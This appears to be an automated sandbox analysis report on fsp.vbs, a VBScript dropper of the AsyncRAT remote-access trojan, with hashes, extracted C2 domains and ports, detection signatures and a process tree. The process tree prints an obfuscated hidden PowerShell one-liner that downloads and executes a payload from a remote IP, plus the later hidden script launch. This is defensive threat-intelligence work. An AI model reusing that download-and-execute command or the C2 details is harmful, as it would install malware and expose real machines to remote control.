Overview

overview

10

Static

static

1

fsp.vbs

windows7-x64

8

fsp.vbs

windows10-1703-x64

10

fsp.vbs

windows10-2004-x64

10

fsp.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    259s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-07-2024 17:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fsp.vbs

  • Size

    10KB

  • MD5

    c9f569bd4a2bdec00f03b7e30f47a8dd

  • SHA1

    2cdd9694e58e8f3c9c8607f5cc6e31d10b482c32

  • SHA256

    7b73596346a36f83b6b540bfc2b779fec228a050e6d7de631d0518b526b9b128

  • SHA512

    98d631ad7749c3b7ebd02da6a00796f66951d42f9142fc1bb459904da253f8c90e974a491d4f1e1364f786a8ae8022080a24840260b01f73fd73e8c0fe9a54cd

  • SSDEEP

    48:/L2tePUutEk+hDnqhdN6+W0K00ah0ZBjAPa:T2kPUGxwqhdN6l0K00xoi

Score
10/10
asyncrathemaexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

AWS | RxR

Botnet

Hema

C2

lolroot.duckdns.org:6606

lolroot.duckdns.org:7707

lolroot.duckdns.org:8808

storeroot.duckdns.org:6606

storeroot.duckdns.org:7707

storeroot.duckdns.org:8808

storexroot.duckdns.org:6606

storexroot.duckdns.org:7707

storexroot.duckdns.org:8808
Mutex

AsyncMutex_9eurjf40i8eurjfiekfj

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fsp.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3752
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3088
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2924
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:372

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      d737fc27bbf2f3bd19d1706af83dbe3f

      SHA1

      212d219394124968b50769c371121a577d973985

      SHA256

      b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

      SHA512

      974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4c4e36b006a0b8f591fb713188de2038

      SHA1

      ddadb2994aed824a61eaa5a12db3c24e71b41554

      SHA256

      ff9590fec79a6bccc0cd70f9ef88433d8407f7828b76643bbcc2dfe8974236b8

      SHA512

      d7815b9298ab0ce0f5659f793160d97701d00ad97ddae62662df7f490aa7d0eddfbaa0f8f201076c66f2fc9a764ea656842d4e2d1ae5796ca674d23d7e9cde8e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2e3068968e808528b95ab643cd87ebe2

      SHA1

      1e0ccfcc7a015132d105484da078644f9cc453a5

      SHA256

      9942369b93614a6fe3daf4614a7c47813e2df827e69c34a2104eb9270442dced

      SHA512

      39a04a5b9348fd3b285697df2063d2b8d0edd49f15468f5274702f78a679e99ed40006b26d84a6367ef8e7b8cc0ae7188c831b0a288265070b9a0d2b719cdad8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dendhkq4.sq0.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Public\roox.bat
      Filesize

      195B

      MD5

      0344d401c7266a2bc6d19f5a2bc90040

      SHA1

      d3bf5a4b55b523429f3c7cb58ffa19504bececfc

      SHA256

      a3a38fb5090f5b9c951160d60d2fcd0e4488b3e72b1823fc17ef34a15fe9dab7

      SHA512

      59b448d02dadd2934abf88c40e25fec741724112e1320770b06df9b862643f2eba9cedee9d58244145fbece6d0d366380d6d2d6b56082a97649683ca10f9bc07

      Download Submit

    • C:\Users\Public\roox.ps1
      Filesize

      704KB

      MD5

      ddf4e48ffb86d26dab3211c61fbfa860

      SHA1

      0a4b84e17fd68c86e11b37f1889a159408a12211

      SHA256

      062254d6904583a767b6662a16977c7f90e0c16d08fbc499f2ee18a9a26af5ec

      SHA512

      da62656a3c5468127304dea22c08f622b3b4bd703f3606619fdae3cddf182d80945358bda5ba87d1788cc9db7e48c8edacb36ff9c81e0d30935c85ece888ccd6

      Download Submit

    • C:\Users\Public\roox.vbs
      Filesize

      686B

      MD5

      a0a3c05080df4421295e559291304405

      SHA1

      286e02a003b7e26a381e41d2127ffb0ed371f5b4

      SHA256

      22889b8d447ea679e8b2fb27eca95d0f04056203c9214818758b0a21379ea323

      SHA512

      ee9971cda442f9dd305e0810babd0a5f94589a966b2a4f10421b341d6e7914fed3f2a12821dc56d338f7ec5ba9a38830727d0e17fd18257e45ebabd7612e99b4

      Download Submit

    • memory/2924-69-0x00000000068E0000-0x000000000697C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/2924-71-0x00000000073D0000-0x0000000007446000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2924-75-0x0000000007660000-0x0000000007740000-memory.dmp

      Filesize

      896KB

      Download

    • memory/2924-74-0x00000000074D0000-0x00000000074DA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2924-73-0x00000000074A0000-0x00000000074BE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2924-72-0x0000000007360000-0x00000000073CA000-memory.dmp

      Filesize

      424KB

      Download

    • memory/2924-70-0x0000000006980000-0x00000000069E6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2924-61-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/2924-64-0x0000000005C30000-0x000000000612E000-memory.dmp

      Filesize

      5.0MB

      Download

    • memory/2924-65-0x00000000058D0000-0x0000000005962000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2924-66-0x0000000005830000-0x000000000583A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3088-3-0x00007FF891AE3000-0x00007FF891AE4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3088-34-0x00007FF891AE0000-0x00007FF8924CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/3088-10-0x000001D833A70000-0x000001D833AE6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/3088-11-0x00007FF891AE0000-0x00007FF8924CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/3088-12-0x00007FF891AE0000-0x00007FF8924CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/3088-27-0x00007FF891AE0000-0x00007FF8924CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/3088-5-0x000001D833940000-0x000001D833962000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4572-60-0x0000015DED520000-0x0000015DED53A000-memory.dmp

      Filesize

      104KB

      Download